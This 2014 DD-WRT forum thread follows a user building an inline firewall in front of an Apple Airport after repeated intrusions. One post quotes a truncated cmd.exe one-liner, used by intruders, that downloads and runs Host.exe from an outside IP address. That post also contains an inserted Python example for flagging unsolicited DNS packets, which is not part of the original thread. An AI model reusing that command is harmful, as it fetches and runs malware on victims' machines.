Constructing an inline firewall

Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware
Author Message
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 2:54    Post subject: Constructing an inline firewall Reply with quote
I'm trying to build an inline (i.e. between the DEMARC and the router) firewall to protect my network.

The network hardware being used is:
"Firewall": Netgear RangeMax Duo, Wireless-N Router WNDR3300. Running Firmware: DD-WRT v24-sp2 (07/22/09) mini

Router: Apple Airport Extreme (802.11n) Generation 1, Model A1143

DEMARC: A coaxial cable modem from Comcast, running on dynamic IP.

So far I haven't had any luck getting the Firewall to work at all. I uploaded the rules with fwbuilder and now the thing appears partially bricked. No ping response and no access to SSH or webconfig. If I connect to it via its wifi (came back on after reset), though, I can access the internet. I tried the 30/30/30 reset but it seems that did not remove the bad firewall rules or something.

I followed this http://blogs.walkerart.org/newmedia/2009/06/22/build-a-bridging-firewall-cheap/

And this http://www.dd-wrt.com/wiki/index.php/Firewall_Builder

Pretty pissed the thing is bricked, but I'm still hopeful for a solution.

My infrastructure looks like this:
_Robb_
DD-WRT User


Joined: 14 Jan 2012
Posts: 324
Location: Wr PL

PostPosted: Mon Sep 01, 2014 5:48    Post subject: Reply with quote
To me it looks like the firewall rules.
_________________

DO NOT 30-30-30 or erase nvram on newer routers! It can brick them.

EA6700: Build 27745 (nvram below 32K, ipv6 - HE 6in4)
E4200: Build 26587
WRT54GL: Retired - waiting in the closet for an emergency.
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 10:46    Post subject: Reply with quote
Hmm, yeah. I just don't know why they aren't being reset...

I really need this online as I've been getting people hacking my VNC/SMB, and DNS attacks. I have another router I could use, but dang.
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 376
Location: Michigan

PostPosted: Mon Sep 01, 2014 11:40    Post subject: Reply with quote
Are you just trying to put another barrier between your modem and the Airport, or are you trying to separate things within your own network? If it's the former, I'm curious why the firewall on the airport is not adequate.
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 12:17    Post subject: Reply with quote
notorious.dds wrote:
Are you just trying to put another barrier between your modem and the Airport, or are you trying to separate things within your own network? If it's the former, I'm curious why the firewall on the airport is not adequate.


I really just need something with flexibility and easily configurable parameters. As far as I know Airport doesn't let you touch the firewall (at least, not easily on a PC), and it actually let some guy get into my VNC (no forwarded ports, he tunneled into my gateway server and compromised it from there). It also doesn't block spoofed DNS attacks, which I get about 20 times a day.

The code they try to run when they break into the VNC usually looks like this:
Code:
cmd.exe /c "echo on&@echo open 208.109.108.16>script.txt&echo um>>script.txt&echo um>>script.txt&@echo binary>>script.txt&@echo get /Host.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v &@start Host.exe &@del script.txt&@reg delete HKEY_CURRENT_U ~~

It's broken because the text field cut it off, luckily...

Anyways, some cheeky guy keeps calling me telling me to type in shit into the run prompt (the usual "your computer is dun broke!" scam). He has my address, name, and phone number, and the last time he called he threatened to kill me/my family/hack me. Pretty much yelling into the phone. So yeah, super fun.

The attack comes in on port 53 (the DNS port) but it isn't a real DNS response, and isn't in response to a DNS request. The packet that's sent to me is malformed, and is actually a check-in message to a trojan virus that was reported to be injected earlier on. The trojan virus checked into their server after being installed (via a javascript exploit, yay), so their server checks back to activate it and send remote commands.

The number of attacks I've received is immense, and they aren't showing any signs of stopping. I need to buy a REAL firewall and possibly set up a Virtual Private Network to funnel my internet traffic through. They're targeting me based on information that does not correlate with my public IP address, because it's dynamic and they'd be looking at a few people per month on one address. Considering the fact that some guy knows my name, address, and phone number, I don't doubt they could easily track every single activity that isn't encrypted or funneled through a VPN. What might be useful to me is a VPN Firewall/Router combo.

The packets are usually sent using connectionless UDP. UDP doesn't require an established connection, so they can just send packets to whoever they want without permission, as opposed to a TCP connection. Another reason they use UDP is that they can forge their IP address, much like forging a driver's license. You can't trace that kind of IP address back to them because it's fake, and always actually belongs to someone else who didn't do anything wrong.

Even a passworded server, secure computer, and an encrypted/passworded VNC server (apparently!) aren't safe against this. The trojan virus is able to inject itself through even open web pages, requiring you only to open the page just once.
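The post above describes inbound UDP/53 datagrams that are not answers to any query the host sent. The check a stateful firewall makes for that case, written out as an added example (not code from this thread or from DD-WRT/fwbuilder) over constructed packet records: an outbound query registers a pending (host, port, resolver, transaction id) tuple, and an inbound packet from port 53 is accepted only if its DNS header parses, has the QR (response) bit set, and matches a pending tuple. Addresses and payloads are constructed sample data.

```python
"""Flag inbound UDP/53 datagrams that are not replies to our own DNS queries."""
import struct
from typing import NamedTuple, Optional

class Packet(NamedTuple):
    direction: str   # "out" (host -> internet) or "in" (internet -> host)
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes

def dns_header(payload: bytes) -> Optional[dict]:
    """Parse the fixed 12-byte DNS header; None if the datagram is too short."""
    if len(payload) < 12:
        return None
    txid, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
    return {"id": txid, "qr": (flags >> 15) & 1, "qdcount": qd, "ancount": an}

def classify(packets) -> list:
    """Return one verdict per packet: query, answer, unsolicited or other."""
    pending = set()          # (host, host port, resolver, txid) of queries in flight
    verdicts = []
    for p in packets:
        hdr = dns_header(p.payload)
        if p.direction == "out" and p.dport == 53 and hdr and hdr["qr"] == 0:
            pending.add((p.src, p.sport, p.dst, hdr["id"]))
            verdicts.append("query")
        elif p.direction == "in" and p.sport == 53:
            key = (p.dst, p.dport, p.src, hdr["id"]) if hdr else None
            if hdr and hdr["qr"] == 1 and key in pending:
                pending.discard(key)     # one reply per query
                verdicts.append("answer")
            else:
                verdicts.append("unsolicited")   # malformed, spoofed or unmatched
        else:
            verdicts.append("other")
    return verdicts

# Constructed sample traffic (documentation addresses, not real hosts).
QUERY = struct.pack("!6H", 0x1A2B, 0x0100, 1, 0, 0, 0) + b"\x07example\x03com\x00\x00\x01\x00\x01"
ANSWER = struct.pack("!6H", 0x1A2B, 0x8180, 1, 1, 0, 0) + b"\xc0\x0c"
SPOOF = struct.pack("!6H", 0x0BAD, 0x8180, 1, 1, 0, 0)   # QR set, but no matching query
MALFORMED = b"\x13\x37\x00"                               # too short to be DNS at all
SAMPLE = [
    Packet("out", "192.168.1.10", 40123, "192.0.2.53", 53, QUERY),
    Packet("in", "192.0.2.53", 53, "192.168.1.10", 40123, ANSWER),
    Packet("in", "203.0.113.7", 53, "192.168.1.10", 40123, SPOOF),
    Packet("in", "203.0.113.7", 53, "192.168.1.10", 5900, MALFORMED),
]
```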
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 376
Location: Michigan

PostPosted: Mon Sep 01, 2014 12:33    Post subject: Reply with quote
Geez, that's pretty terrible. Given your story, I'm not sure what level of security is needed in your case. At any rate, I can get you where you want to go with your current setup.

Another question I have is regarding the continued use of the Airport. Can I assume you want to keep this in use mainly due to the 802.11AC, or is there some other reason?
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 12:41    Post subject: Reply with quote
notorious.dds wrote:
Geez, that's pretty terrible. Given your story, I'm not sure what level of security is needed in your case. At any rate, I can get you where you want to go with your current setup.

Another question I have is regarding the continued use of the Airport. Can I assume you want to keep this in use mainly due to the 802.11AC, or is there some other reason?


Yeah, the Airport is my most capable WLAN router at the moment.

I'm definitely going to invest ($$$) in more security and hardware later, but for now this is a good temporary ass-covering solution for little cost. I have plans to set up some NID/AV servers using the Raspberry Pi as a network device as well (I've heard it's amazing as network hardware).

If I can't fix this Netgear, I have a good ol' Linksys WRT54G v5 I can use. Well, not quite "good" as the v5 sucks butts, but still better than a brick. Unless, of course, I can beat my attackers to death with it...
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 376
Location: Michigan

PostPosted: Mon Sep 01, 2014 13:31    Post subject: Reply with quote
Okay, so the easiest solution I can offer is to use the netgear in its default setup (i.e. router/gateway) and to configure your airport as a wireless access point. You'll have wireless and use of the LAN ports this way, but no routing or firewall through the airport. This should be doable even with stock firmware. (Although, I've found it's not hard to overestimate the configurability of Apple products.)

Another option would be to set up a subnet with the airport. However, this would isolate anything connected to the airport from anything connected to the netgear, and it would add another routing sequence for all data in and out. Unless it turns out that the first method is not possible with the airport, I don't currently see any advantages to your setup using the second method.
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 14:24    Post subject: Reply with quote
notorious.dds wrote:
Okay, so the easiest solution I can offer is to use the netgear in its default setup (i.e. router/gateway) and to configure your airport as a wireless access point. You'll have wireless and use of the LAN ports this way, but no routing or firewall through the airport. This should be doable even with stock firmware. (Although, I've found it's not hard to overestimate the configurability of Apple products.)


Ooh, that sounds like it would make everything a lot easier. So instead of funneling the WAN through the Firewall to the WLAN Router, just make the Firewall the router and make the WLAN Router just an AP?

I think there might be a slight speed decrease associated with that, though. The data interchange between the two devices would theoretically be a lot higher than if the WLAN Router handled the routing and DHCP. I'm mostly worried about the capacity of the NICs.


notorious.dds wrote:

Another option would be to set up a subnet with the airport. However, this would isolate anything connected to the airport from anything connected to the netgear, and it would add another routing sequence for all data in and out. Unless it turns out that the first method is not possible with the airport, I don't currently see any advantages to your setup using the second method.


That's also a great option, and is what I was trying to do initially.
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 376
Location: Michigan

PostPosted: Mon Sep 01, 2014 15:00    Post subject: Reply with quote
Floofies wrote:
I think there might be a slight speed decrease associated with that, though. The data interchange between the two devices would theoretically be a lot higher than if the WLAN Router handled the routing and DHCP. I'm mostly worried about the capacity of the NICs.

The speed loss is inevitable so long as you're using the firewall on the netgear. It will be your bottleneck. You can turn off DHCP on the netgear and turn it on at the Airport running as an AP, but I don't think it'll help you much.

Option 2 will allow you to avoid the bottleneck for intranet traffic, but you'll hit it with anything going outside.

My recommendation: Use the first option, but find a router that has a gigabit switch instead of the 10/100 which is on that WNDR3300. I've seen them on Ebay for under $40.

I guess it may be possible to insert the netgear's firewall capabilities between the WAN and LAN of the airport, but that's beyond my understanding... and I still don't see how you would avoid its hardware limitations...
Wolf_666
DD-WRT Novice


Joined: 02 Jul 2014
Posts: 20
Location: Italy

PostPosted: Mon Sep 01, 2014 19:21    Post subject: Reply with quote
I suggest looking at a more powerful i386 appliance running a dedicated OS and firewall. You should also see benefits for VPN.